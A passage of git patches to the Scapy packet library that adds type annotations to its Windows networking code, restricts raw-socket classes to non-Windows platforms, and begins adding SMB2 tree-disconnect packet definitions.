cast(bool, IPython.utils.io.ask_yes_no(msg, default='y')) except (NameError, ImportError): while True: _confir = input(msg) @@ -557,6 +606,7 @@ def _ask_user(): ) def load(self, NetworkInterface_Win=NetworkInterface_Win): + # type: (type) -> Dict[str, NetworkInterface] results = {} if not conf.cache_pcapiflist: # Try a restart @@ -602,6 +652,7 @@ def load(self, NetworkInterface_Win=NetworkInterface_Win): return results def reload(self): + # type: () -> Dict[str, NetworkInterface] """Reload interface list""" self.restarted_adapter = False if conf.use_pcap: @@ -616,8 +667,12 @@ def reload(self): def get_ips(v6=False): + # type: (bool) -> Dict[NetworkInterface, List[str]] """Returns all available IPs matching to interfaces, using the windows system. - Should only be used as a WinPcapy fallback.""" + Should only be used as a WinPcapy fallback. + + :param v6: IPv6 addresses + """ res = {} for iface in six.itervalues(conf.ifaces): if v6: @@ -628,16 +683,19 @@ def get_ips(v6=False): def get_if_raw_addr(iff): + # type: (Union[NetworkInterface, str]) -> bytes """Return the raw IPv4 address of interface""" iff = resolve_iface(iff) if not iff.ip: - return None + return b"\x00" * 4 return inet_pton(socket.AF_INET, iff.ip) def get_ip_from_name(ifname, v6=False): + # type: (str, bool) -> str """Backward compatibility: indirectly calls get_ips - Deprecated.""" + Deprecated. + """ warnings.warn( "get_ip_from_name is deprecated. Use the `ip` attribute of the iface " "or use get_ips() to get all ips per interface.", @@ -648,17 +706,20 @@ def get_ip_from_name(ifname, v6=False): def pcap_service_name(): + # type: () -> str """Return the pcap adapter service's name""" return "npcap" if conf.use_npcap else "npf" def pcap_service_status(): + # type: () -> bool """Returns whether the windows pcap adapter is running or not""" status = get_service_status(pcap_service_name()) return status["dwCurrentState"] == 4 def _pcap_service_control(action, askadmin=True): + # type: (str, bool) -> bool """Internal util to run pcap control command""" command = action + ' ' + pcap_service_name() res, code = _exec_cmd(_encapsulate_admin(command) if askadmin else command) @@ -668,11 +729,13 @@ def _pcap_service_control(action, askadmin=True): def pcap_service_start(askadmin=True): + # type: (bool) -> bool """Starts the pcap adapter. Will ask for admin. Returns True if success""" return _pcap_service_control('sc start', askadmin=askadmin) def pcap_service_stop(askadmin=True): + # type: (bool) -> bool """Stops the pcap adapter. Will ask for admin. Returns True if success""" return _pcap_service_control('sc stop', askadmin=askadmin) @@ -680,11 +743,15 @@ def pcap_service_stop(askadmin=True): if conf.use_pcap: _orig_open_pcap = libpcap.open_pcap - def open_pcap(iface, *args, **kargs): + def open_pcap(iface, # type: Union[str, NetworkInterface] + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> libpcap._PcapWrapper_libpcap """open_pcap: Windows routine for creating a pcap from an interface. This function is also responsible for detecting monitor mode. """ - iface = resolve_iface(iface) + iface = cast(NetworkInterface_Win, resolve_iface(iface)) iface_network_name = iface.network_name if not iface: raise Scapy_Exception( @@ -701,22 +768,26 @@ def open_pcap(iface, *args, **kargs): # interface state iface.setmonitor(kw_monitor) return _orig_open_pcap(iface_network_name, *args, **kargs) - libpcap.open_pcap = open_pcap + libpcap.open_pcap = open_pcap # type: ignore def get_if_raw_hwaddr(iface): - iface = resolve_iface(iface) - return ARPHDR_ETHER, mac2str(iface.mac) + # type: (Union[NetworkInterface, str]) -> Tuple[int, bytes] + _iface = resolve_iface(iface) + return ARPHDR_ETHER, _iface.mac and mac2str(_iface.mac) or b"\x00" * 6 def _read_routes_c_v1(): + # type: () -> List[Tuple[int, int, str, str, str, int]] """Retrieve Windows routes through a GetIpForwardTable call. This is compatible with XP but won't get IPv6 routes.""" def _extract_ip(obj): + # type: (int) -> str return inet_ntop(socket.AF_INET, struct.pack(" int if WINDOWS_XP: return struct.unpack("I", ip))[0] return ip @@ -729,7 +800,7 @@ def _proc(ip): metric = route['ForwardMetric1'] # Build route try: - iface = dev_from_index(ifIndex) + iface = cast(NetworkInterface_Win, dev_from_index(ifIndex)) if not iface.ip or iface.ip == "0.0.0.0": continue except ValueError: @@ -742,7 +813,20 @@ def _proc(ip): return routes -def _read_routes_c(ipv6=False): +@overload +def _read_routes_c(ipv6): # noqa: F811 + # type: (Literal[True]) -> List[Tuple[str, int, str, str, List[str], int]] + pass + + +@overload +def _read_routes_c(ipv6=False): # noqa: F811 + # type: (Literal[False]) -> List[Tuple[int, int, str, str, str, int]] + pass + + +def _read_routes_c(ipv6=False): # noqa: F811 + # type: (bool) -> Union[List[Tuple[int, int, str, str, str, int]], List[Tuple[str, int, str, str, List[str], int]]] # noqa: E501 """Retrieve Windows routes through a GetIpForwardTable2 call. This is not available on Windows XP !""" @@ -752,14 +836,14 @@ def _read_routes_c(ipv6=False): metric_name = 'ipv6_metric' if ipv6 else 'ipv4_metric' if ipv6: lifaddr = in6_getifaddr() - routes = [] + routes = [] # type: List[Any] def _extract_ip(obj): + # type: (Dict[str, Any]) -> str ip = obj[sock_addr_name][sin_addr_name] ip = bytes(bytearray(ip['byte'])) # Build IP - ip = inet_ntop(af, ip) - return ip + return inet_ntop(af, ip) for route in GetIpForwardTable2(af): # Extract data @@ -789,6 +873,7 @@ def _extract_ip(obj): def read_routes(): + # type: () -> List[Tuple[int, int, str, str, str, int]] routes = [] try: if WINDOWS_XP: @@ -806,23 +891,31 @@ def read_routes(): def in6_getifaddr(): + # type: () -> List[Tuple[str, int, str]] """ Returns all IPv6 addresses found on the computer """ - ifaddrs = [] + ifaddrs = [] # type: List[Tuple[str, int, str]] ip6s = get_ips(v6=True) - for iface in ip6s: - ips = ip6s[iface] + for iface, ips in ip6s.items(): for ip in ips: scope = in6_getscope(ip) - ifaddrs.append((ip, scope, iface)) + ifaddrs.append((ip, scope, iface.network_name)) # Appends Npcap loopback if available if conf.use_npcap and conf.loopback_name: ifaddrs.append(("::1", 0, conf.loopback_name)) return ifaddrs -def _append_route6(routes, dpref, dp, nh, iface, lifaddr, metric): +def _append_route6(routes, # type: List[Tuple[str, int, str, str, List[str], int]] + dpref, # type: str + dp, # type: int + nh, # type: str + iface, # type: str + lifaddr, # type: List[Tuple[str, int, str]] + metric, # type: int + ): + # type: (...) -> None cset = [] # candidate set (possible source addresses) if iface == conf.loopback_name: if dpref == '::': @@ -838,6 +931,7 @@ def _append_route6(routes, dpref, dp, nh, iface, lifaddr, metric): def read_routes6(): + # type: () -> List[Tuple[str, int, str, str, List[str], int]] routes6 = [] if WINDOWS_XP: return routes6 @@ -848,7 +942,11 @@ def read_routes6(): return routes6 -def _route_add_loopback(routes=None, ipv6=False, iflist=None): +def _route_add_loopback(routes=None, # type: Optional[List[Any]] + ipv6=False, # type: bool + iflist=None, # type: Optional[List[str]] + ): + # type: (...) -> None """Add a route to 127.0.0.1 and ::1 to simplify unit tests on Windows""" if not WINDOWS: warning("Calling _route_add_loopback is only valid on Windows") @@ -881,15 +979,22 @@ def _route_add_loopback(routes=None, ipv6=False, iflist=None): if isinstance(conf.iface, NetworkInterface): if conf.iface.network_name == conf.loopback_name: conf.iface = adapter - conf.netcache.arp_cache["127.0.0.1"] = "ff:ff:ff:ff:ff:ff" - conf.netcache.in6_neighbor["::1"] = "ff:ff:ff:ff:ff:ff" + conf.netcache.arp_cache["127.0.0.1"] = "ff:ff:ff:ff:ff:ff" # type: ignore + conf.netcache.in6_neighbor["::1"] = "ff:ff:ff:ff:ff:ff" # type: ignore # Build the packed network addresses loop_net = struct.unpack("!I", socket.inet_aton("127.0.0.0"))[0] loop_mask = struct.unpack("!I", socket.inet_aton("255.0.0.0"))[0] # Build the fake routes - loopback_route = (loop_net, loop_mask, "0.0.0.0", adapter, "127.0.0.1", 1) - loopback_route6 = ('::1', 128, '::', adapter, ["::1"], 1) - loopback_route6_custom = ("fe80::", 128, "::", adapter, ["::1"], 1) + loopback_route = ( + loop_net, + loop_mask, + "0.0.0.0", + adapter.network_name, + "127.0.0.1", + 1 + ) + loopback_route6 = ('::1', 128, '::', adapter.network_name, ["::1"], 1) + loopback_route6_custom = ("fe80::", 128, "::", adapter.network_name, ["::1"], 1) if routes is None: # Injection conf.route6.routes.append(loopback_route6) @@ -910,6 +1015,7 @@ class _NotAvailableSocket(SuperSocket): desc = "wpcap.dll missing" def __init__(self, *args, **kargs): + # type: (*Any, **Any) -> None raise RuntimeError( "Sniffing and sending packets is not available at layer 2: " "winpcap is not installed. You may use conf.L3socket or" diff --git a/scapy/arch/windows/native.py b/scapy/arch/windows/native.py index e4ef9661181..567208986eb 100644 --- a/scapy/arch/windows/native.py +++ b/scapy/arch/windows/native.py @@ -41,7 +41,6 @@ then do custom calls through the socket using get_current_icmp_seq(). See the tests (windows.uts) for an example. """ - import io import os import socket @@ -54,9 +53,19 @@ from scapy.config import conf from scapy.data import MTU from scapy.error import Scapy_Exception, warning -from scapy.interfaces import resolve_iface +from scapy.packet import Packet +from scapy.interfaces import resolve_iface, _GlobInterfaceType from scapy.supersocket import SuperSocket +# Typing imports +from scapy.compat import ( + Any, + List, + Optional, + Tuple, + Type, +) + # Watch out for import loops (inet...) @@ -66,12 +75,20 @@ class L3WinSocket(SuperSocket): __selectable_force_select__ = True # see automaton.py __slots__ = ["promisc", "cls", "ipv6", "proto"] - def __init__(self, iface=None, proto=socket.IPPROTO_IP, - ttl=128, ipv6=False, promisc=None, **kwargs): + def __init__(self, + iface=None, # type: Optional[_GlobInterfaceType] + proto=socket.IPPROTO_IP, # type: int + ttl=128, # type: int + ipv6=False, # type: bool + promisc=True, # type: bool + **kwargs # type: Any + ): + # type: (...) -> None from scapy.layers.inet import IP from scapy.layers.inet6 import IPv6 for kwarg in kwargs: warning("Dropping unsupported option: %s" % kwarg) + self.iface = iface and resolve_iface(iface) or conf.iface af = socket.AF_INET6 if ipv6 else socket.AF_INET self.proto = proto if ipv6: @@ -117,8 +134,7 @@ def __init__(self, iface=None, proto=socket.IPPROTO_IP, self.ins.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl) self.outs.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl) # Bind on all ports - iface = resolve_iface(iface) or conf.iface - host = iface.ip if iface.ip else socket.gethostname() + host = self.iface.ip if self.iface.ip else socket.gethostname() self.ins.bind((host, 0)) self.ins.setblocking(False) # Get as much data as possible: reduce what is cropped @@ -137,7 +153,11 @@ def __init__(self, iface=None, proto=socket.IPPROTO_IP, except (OSError, socket.error): pass try: # Windows 10+ recent builds only - self.ins.setsockopt(socket.IPPROTO_IP, socket.IP_RECVTTL, 1) + self.ins.setsockopt( + socket.IPPROTO_IP, + socket.IP_RECVTTL, # type: ignore + 1 + ) except (OSError, socket.error): pass if promisc: @@ -145,14 +165,18 @@ def __init__(self, iface=None, proto=socket.IPPROTO_IP, self.ins.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON) def send(self, x): + # type: (Packet) -> int data = raw(x) if self.cls not in x: raise Scapy_Exception("L3WinSocket can only send IP/IPv6 packets !" " Install Npcap/Winpcap to send more") + if not self.outs: + raise Scapy_Exception("Socket not created") dst_ip = str(x[self.cls].dst) - self.outs.sendto(data, (dst_ip, 0)) + return self.outs.sendto(data, (dst_ip, 0)) def nonblock_recv(self, x=MTU): + # type: (int) -> Optional[Packet] try: return self.recv() except IOError: @@ -168,10 +192,11 @@ def nonblock_recv(self, x=MTU): # not receive any IPv6 headers using a raw socket. def recv_raw(self, x=MTU): + # type: (int) -> Tuple[Type[Packet], bytes, float] try: data, address = self.ins.recvfrom(x) except io.BlockingIOError: - return None, None, None + return None, None, None # type: ignore from scapy.layers.inet import IP from scapy.layers.inet6 import IPv6 if self.ipv6: @@ -188,12 +213,14 @@ def recv_raw(self, x=MTU): return IP, data, time.time() def close(self): + # type: () -> None if not self.closed and self.promisc: self.ins.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF) super(L3WinSocket, self).close() @staticmethod def select(sockets, remain=None): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] return select_objects(sockets, remain) @@ -201,10 +228,12 @@ class L3WinSocket6(L3WinSocket): desc = "a native Layer 3 (IPv6) raw socket under Windows" def __init__(self, **kwargs): + # type: (**Any) -> None super(L3WinSocket6, self).__init__(ipv6=True, **kwargs) def open_icmp_firewall(host): + # type: (str) -> int """Temporarily open the ICMP firewall. Tricks Windows into allowing ICMP packets for a short period of time (~ 1 minute)""" # We call ping with a timeout of 1ms: will return instantly @@ -216,6 +245,7 @@ def open_icmp_firewall(host): def get_current_icmp_seq(): + # type: () -> int """See help(scapy.arch.windows.native) for more information. Returns the current ICMP seq number.""" return GetIcmpStatistics()['stats']['icmpOutStats']['dwEchos'] diff --git a/scapy/arch/windows/structures.py b/scapy/arch/windows/structures.py index 88ba5cfe6b6..c0d2e33e493 100644 --- a/scapy/arch/windows/structures.py +++ b/scapy/arch/windows/structures.py @@ -12,13 +12,26 @@ import ctypes import ctypes.wintypes -from ctypes import Structure, POINTER, byref, create_string_buffer, WINFUNCTYPE - +from ctypes import ( + POINTER, + Structure, + WINFUNCTYPE, + byref, + create_string_buffer, +) from scapy.config import conf from scapy.consts import WINDOWS_XP +# Typing imports +from scapy.compat import ( + AddressFamily, + Any, + Dict, + List, + Optional, +) + ANY_SIZE = 65500 # FIXME quite inefficient :/ -AF_UNSPEC = 0 NO_ERROR = 0x0 CHAR = ctypes.c_char @@ -46,6 +59,7 @@ def _resolve_list(list_obj): + # type: (Any) -> List[Dict[str, Any]] current = list_obj _list = [] while current and hasattr(current, "contents"): @@ -55,7 +69,8 @@ def _resolve_list(list_obj): def _struct_to_dict(struct_obj): - results = {} + # type: (Any) -> Dict[str, Any] + results = {} # type: Dict[str, Any] for fname, ctype in struct_obj.__class__._fields_: val = getattr(struct_obj, fname) if fname == "next": @@ -82,8 +97,11 @@ def _struct_to_dict(struct_obj): _winapi_SetConsoleTitle.argtypes = [LPWSTR] def _windows_title(title=None): - """Updates the terminal title with the default one or with `title` - if provided.""" + # type: (Optional[str]) -> None + """ + Updates the terminal title with the default one or with `title` + if provided. + """ if conf.interactive: _winapi_SetConsoleTitle(title or "Scapy v{}".format(conf.version)) @@ -118,6 +136,7 @@ class SERVICE_STATUS(Structure): QueryServiceStatus.argtypes = [SC_HANDLE, POINTER(SERVICE_STATUS)] def get_service_status(service): + # type: (str) -> Dict[str, int] """Returns content of QueryServiceStatus for a service""" SERVICE_QUERY_STATUS = 0x0004 schSCManager = OpenSCManagerW( @@ -220,6 +239,7 @@ class MIB_ICMP(Structure): def GetIcmpStatistics(): + # type: () -> Dict[str, Dict[str, Dict[str, int]]] """Return all Windows ICMP stats from iphlpapi""" statistics = MIB_ICMP() _GetIcmpStatistics(byref(statistics)) @@ -431,7 +451,8 @@ class IP_ADAPTER_ADDRESSES(Structure): ('GetAdaptersAddresses', iphlpapi)) -def GetAdaptersAddresses(AF=AF_UNSPEC): +def GetAdaptersAddresses(AF=AddressFamily.AF_UNSPEC): + # type: (int) -> List[Dict[str, Any]] """Return all Windows Adapters addresses from iphlpapi""" # We get the size first size = ULONG() @@ -494,6 +515,7 @@ class MIB_IPFORWARDTABLE(Structure): def GetIpForwardTable(): + # type: () -> List[Dict[str, Any]] """Return all Windows routes (IPv4 only) from iphlpapi""" # We get the size first size = ULONG() @@ -570,7 +592,8 @@ class MIB_IPFORWARD_TABLE2(Structure): ) -def GetIpForwardTable2(AF=AF_UNSPEC): +def GetIpForwardTable2(AF=AddressFamily.AF_UNSPEC): + # type: (AddressFamily) -> List[Dict[str, Any]] """Return all Windows routes (IPv4/IPv6) from iphlpapi""" if WINDOWS_XP: raise OSError("Not available on Windows XP !") diff --git a/scapy/automaton.py b/scapy/automaton.py index 2e3dac5f3af..4dd647cec75 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -140,39 +140,40 @@ def __init__(self, name=None): self.__rd, self.__wr = os.pipe() self.__queue = deque() # type: Deque[_T] if WINDOWS: + self._fd = None # type: Optional[int] self._wincreate() if WINDOWS: def _wincreate(self): # type: () -> None - self._fd = ctypes.windll.kernel32.CreateEventA( + self._fd = cast(int, ctypes.windll.kernel32.CreateEventA( None, True, False, ctypes.create_string_buffer(b"ObjectPipe %f" % random.random()) - ) + )) def _winset(self): # type: () -> None if ctypes.windll.kernel32.SetEvent( ctypes.c_void_p(self._fd)) == 0: - warning(ctypes.FormatError()) + warning(ctypes.FormatError(ctypes.GetLastError())) def _winreset(self): # type: () -> None if ctypes.windll.kernel32.ResetEvent( ctypes.c_void_p(self._fd)) == 0: - warning(ctypes.FormatError()) + warning(ctypes.FormatError(ctypes.GetLastError())) def _winclose(self): # type: () -> None if self._fd and ctypes.windll.kernel32.CloseHandle( ctypes.c_void_p(self._fd)) == 0: - warning(ctypes.FormatError()) + warning(ctypes.FormatError(ctypes.GetLastError())) self._fd = None def fileno(self): # type: () -> int if WINDOWS: - return self._fd + return self._fd if self._fd is not None else -1 return self.__rd def send(self, obj): diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 487011f707a..24872f09aad 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -450,7 +450,7 @@ def psdump(self, filename=None, **kargs): if filename is None: fname = get_temp_file(autoext=kargs.get("suffix", ".eps")) canvas.writeEPSfile(fname) - if WINDOWS and conf.prog.psreader is None: + if WINDOWS and not conf.prog.psreader: os.startfile(fname) else: with ContextManagerSubprocess(conf.prog.psreader): @@ -475,7 +475,7 @@ def pdfdump(self, filename=None, **kargs): if filename is None: fname = get_temp_file(autoext=kargs.get("suffix", ".pdf")) canvas.writePDFfile(fname) - if WINDOWS and conf.prog.pdfreader is None: + if WINDOWS and not conf.prog.pdfreader: os.startfile(fname) else: with ContextManagerSubprocess(conf.prog.pdfreader): @@ -500,7 +500,7 @@ def svgdump(self, filename=None, **kargs): if filename is None: fname = get_temp_file(autoext=kargs.get("suffix", ".svg")) canvas.writeSVGfile(fname) - if WINDOWS and conf.prog.svgreader is None: + if WINDOWS and not conf.prog.svgreader: os.startfile(fname) else: with ContextManagerSubprocess(conf.prog.svgreader): diff --git a/scapy/compat.py b/scapy/compat.py index 594e3cd27ef..b076f446ec0 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -232,6 +232,7 @@ def __reduce__(self): class AddressFamily: AF_INET = socket.AF_INET AF_INET6 = socket.AF_INET6 + AF_UNSPEC = socket.AF_UNSPEC ########### diff --git a/scapy/config.py b/scapy/config.py index c7916da2aa8..5a5c6ca5a54 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -29,6 +29,7 @@ from scapy.themes import NoTheme, apply_ipython_style from scapy.compat import ( + cast, Any, Callable, DecoratorCallable, @@ -50,6 +51,7 @@ # Do not import at runtime import scapy.as_resolvers from scapy.packet import Packet + from scapy.supersocket import SuperSocket # noqa: F401 import scapy.asn1.asn1 import scapy.asn1.mib @@ -630,8 +632,13 @@ def _set_conf_sockets(): if LINUX: from scapy.arch.linux import L3PacketSocket, L2Socket, L2ListenSocket conf.L3socket = L3PacketSocket - conf.L3socket6 = functools.partial( # type: ignore - L3PacketSocket, filter="ip6") + conf.L3socket6 = cast( + "Type[SuperSocket]", + functools.partial( + L3PacketSocket, + filter="ip6" + ) + ) conf.L2socket = L2Socket conf.L2listen = L2ListenSocket conf.ifaces.reload() @@ -646,10 +653,11 @@ def _set_conf_sockets(): conf.ifaces.reload() # No need to update globals on Windows return - from scapy.supersocket import L3RawSocket - from scapy.layers.inet6 import L3RawSocket6 - conf.L3socket = L3RawSocket - conf.L3socket6 = L3RawSocket6 + else: + from scapy.supersocket import L3RawSocket + from scapy.layers.inet6 import L3RawSocket6 + conf.L3socket = L3RawSocket + conf.L3socket6 = L3RawSocket6 def _socket_changer(attr, val, old): diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 2aba29b8cb9..4f3aff74191 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -41,7 +41,7 @@ import scapy.libs.six as six from scapy.packet import bind_layers, Packet, Raw from scapy.sendrecv import sendp, sniff, sr, srp1 -from scapy.supersocket import SuperSocket, L3RawSocket +from scapy.supersocket import SuperSocket from scapy.utils import checksum, strxor from scapy.pton_ntop import inet_pton, inet_ntop from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \ @@ -3368,12 +3368,15 @@ def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), ############################################################################# -class L3RawSocket6(L3RawSocket): - def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 - # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 - self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 - self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 - self.iface = iface +if not WINDOWS: + from scapy.supersocket import L3RawSocket + + class L3RawSocket6(L3RawSocket): + def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 + # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 + self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 + self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 + self.iface = iface def IPv6inIP(dst='203.178.135.36', src=None): diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 88d7f726650..8ee9b1bfc91 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -690,7 +690,13 @@ def _start_windows(self): self.name = "Scapy" if self.name is None else self.name # Start a powershell in a new window and print the PID cmd = "$app = Start-Process PowerShell -ArgumentList '-command &{$host.ui.RawUI.WindowTitle=\\\"%s\\\";Get-Content \\\"%s\\\" -wait}' -passthru; echo $app.Id" % (self.name, self.__f.replace("\\", "\\\\")) # noqa: E501 - proc = subprocess.Popen([conf.prog.powershell, cmd], stdout=subprocess.PIPE) # noqa: E501 + proc = subprocess.Popen( + [ + getattr(conf.prog, "powershell"), + cmd + ], + stdout=subprocess.PIPE + ) output, _ = proc.communicate() # This is the process PID self.pid = int(output) diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 618b54c9519..ff070d6e039 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -111,7 +111,7 @@ def send(self, x): else: return 0 - if six.PY2: + if six.PY2 or WINDOWS: def _recv_raw(self, sock, x): # type: (socket.socket, int) -> Tuple[bytes, Any, Optional[float]] """Internal function to receive a Packet""" @@ -283,96 +283,97 @@ def __exit__(self, exc_type, exc_value, traceback): self.close() -class L3RawSocket(SuperSocket): - desc = "Layer 3 using Raw sockets (PF_INET/SOCK_RAW)" +if not WINDOWS: + class L3RawSocket(SuperSocket): + desc = "Layer 3 using Raw sockets (PF_INET/SOCK_RAW)" + + def __init__(self, + type=ETH_P_IP, # type: int + filter=None, # type: Optional[str] + iface=None, # type: Optional[_GlobInterfaceType] + promisc=None, # type: Optional[bool] + nofilter=0 # type: int + ): + # type: (...) -> None + self.outs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 + self.outs.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1) + self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 + if iface is not None: + iface = network_name(iface) + self.iface = iface + self.ins.bind((iface, type)) + else: + self.iface = "any" + if not six.PY2: + try: + # Receive Auxiliary Data (VLAN tags) + self.ins.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1) + self.ins.setsockopt( + socket.SOL_SOCKET, + SO_TIMESTAMPNS, + 1 + ) + self.auxdata_available = True + except OSError: + # Note: Auxiliary Data is only supported since + # Linux 2.6.21 + msg = "Your Linux Kernel does not support Auxiliary Data!" + log_runtime.info(msg) + + def recv(self, x=MTU): + # type: (int) -> Optional[Packet] + data, sa_ll, ts = self._recv_raw(self.ins, x) + if sa_ll[2] == socket.PACKET_OUTGOING: + return None + if sa_ll[3] in conf.l2types: + cls = conf.l2types.num2layer[sa_ll[3]] # type: Type[Packet] + lvl = 2 + elif sa_ll[1] in conf.l3types: + cls = conf.l3types.num2layer[sa_ll[1]] + lvl = 3 + else: + cls = conf.default_l2 + warning("Unable to guess type (interface=%s protocol=%#x family=%i). Using %s", sa_ll[0], sa_ll[1], sa_ll[3], cls.name) # noqa: E501 + lvl = 3 - def __init__(self, - type=ETH_P_IP, # type: int - filter=None, # type: Optional[str] - iface=None, # type: Optional[_GlobInterfaceType] - promisc=None, # type: Optional[bool] - nofilter=0 # type: int - ): - # type: (...) -> None - self.outs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 - self.outs.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1) - self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 - if iface is not None: - iface = network_name(iface) - self.iface = iface - self.ins.bind((iface, type)) - else: - self.iface = "any" - if not six.PY2: try: - # Receive Auxiliary Data (VLAN tags) - self.ins.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1) - self.ins.setsockopt( - socket.SOL_SOCKET, - SO_TIMESTAMPNS, - 1 - ) - self.auxdata_available = True - except OSError: - # Note: Auxiliary Data is only supported since - # Linux 2.6.21 - msg = "Your Linux Kernel does not support Auxiliary Data!" - log_runtime.info(msg) - - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] - data, sa_ll, ts = self._recv_raw(self.ins, x) - if sa_ll[2] == socket.PACKET_OUTGOING: - return None - if sa_ll[3] in conf.l2types: - cls = conf.l2types.num2layer[sa_ll[3]] # type: Type[Packet] - lvl = 2 - elif sa_ll[1] in conf.l3types: - cls = conf.l3types.num2layer[sa_ll[1]] - lvl = 3 - else: - cls = conf.default_l2 - warning("Unable to guess type (interface=%s protocol=%#x family=%i). Using %s", sa_ll[0], sa_ll[1], sa_ll[3], cls.name) # noqa: E501 - lvl = 3 - - try: - pkt = cls(data) - except KeyboardInterrupt: - raise - except Exception: - if conf.debug_dissector: + pkt = cls(data) + except KeyboardInterrupt: raise - pkt = conf.raw_layer(data) - - if lvl == 2: - pkt = pkt.payload - - if pkt is not None: - if ts is None: - from scapy.arch.linux import get_last_packet_timestamp - ts = get_last_packet_timestamp(self.ins) - pkt.time = ts - return pkt + except Exception: + if conf.debug_dissector: + raise + pkt = conf.raw_layer(data) + + if lvl == 2: + pkt = pkt.payload + + if pkt is not None: + if ts is None: + from scapy.arch.linux import get_last_packet_timestamp + ts = get_last_packet_timestamp(self.ins) + pkt.time = ts + return pkt - def send(self, x): - # type: (Packet) -> int - try: - sx = raw(x) - if self.outs: - x.sent_time = time.time() - return self.outs.sendto( - sx, - (x.dst, 0) + def send(self, x): + # type: (Packet) -> int + try: + sx = raw(x) + if self.outs: + x.sent_time = time.time() + return self.outs.sendto( + sx, + (x.dst, 0) + ) + except AttributeError: + raise ValueError( + "Missing 'dst' attribute in the first layer to be " + "sent using a native L3 socket ! (make sure you passed the " + "IP layer)" ) - except AttributeError: - raise ValueError( - "Missing 'dst' attribute in the first layer to be " - "sent using a native L3 socket ! (make sure you passed the " - "IP layer)" - ) - except socket.error as msg: - log_runtime.error(msg) - return 0 + except socket.error as msg: + log_runtime.error(msg) + return 0 class SimpleSocket(SuperSocket): diff --git a/scapy/utils.py b/scapy/utils.py index 45ac6d37dd7..060ba139d34 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -868,8 +868,8 @@ def do_graph( warning("Temporary file '%s' could not be written. Graphic will not be displayed.", tempfile) # noqa: E501 break else: - if conf.prog.display == conf.prog._default: - os.startfile(target.name) # type: ignore + if WINDOWS and conf.prog.display == conf.prog._default: + os.startfile(target.name) else: with ContextManagerSubprocess(conf.prog.display): subprocess.Popen([conf.prog.display, target.name]) diff --git a/tox.ini b/tox.ini index c62fcfd2228..974e552951f 100644 --- a/tox.ini +++ b/tox.ini @@ -87,7 +87,8 @@ skip_install = true deps = mypy==0.931 typing types-mock -commands = python .config/mypy/mypy_check.py +commands = python .config/mypy/mypy_check.py linux + python .config/mypy/mypy_check.py win32 [testenv:docs] From c8a1b237f93235b7ebb46b36fcb5ade7b423fb12 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 24 Aug 2022 10:51:10 +0200 Subject: [PATCH 0875/1632] SMB2: add tree disconnect --- scapy/layers/smb2.py | 41 ++++++++++++++++++++++++++++++++++++++++- 1 file changed, 40 insertions(+), 1 deletion(-) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 3fc274543a2..4fd9352da21 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -362,6 +362,10 @@ def guess_payload_class(self, payload): if self.Flags.SMB2_FLAGS_SERVER_TO_REDIR: return SMB2_Tree_Connect_Response return SMB2_Tree_Connect_Request + elif self.Command == 0x0004: # TREE disconnect + if self.Flags.SMB2_FLAGS_SERVER_TO_REDIR: + return SMB2_Tree_Disconnect_Response + return SMB2_Tree_Disconnect_Request elif self.Command == 0x0005: # Create if self.Flags.SMB2_FLAGS_SERVER_TO_REDIR: return SMB2_Create_Response @@ -928,7 +932,6 @@ def post_build(self, pkt, pay): class SMB2_Tree_Connect_Response(_SMB2_Payload): name = "SMB2 TREE_CONNECT Response" - OFFSET = 8 + 64 fields_desc = [ XLEShortField("StructureSize", 0x10), ByteEnumField("ShareType", 0, {0x01: "DISK", @@ -971,6 +974,42 @@ class SMB2_Tree_Connect_Response(_SMB2_Payload): Flags=1 ) +# sect 2.2.11 + + +class SMB2_Tree_Disconnect_Request(_SMB2_Payload): + name = "SMB2 TREE_DISCONNECT Request" + fields_desc = [ + XLEShortField("StructureSize", 0x4), + XLEShortField("Reserved", 0), + ] + + +bind_top_down( + SMB2_Header, + SMB2_Tree_Disconnect_Request, + 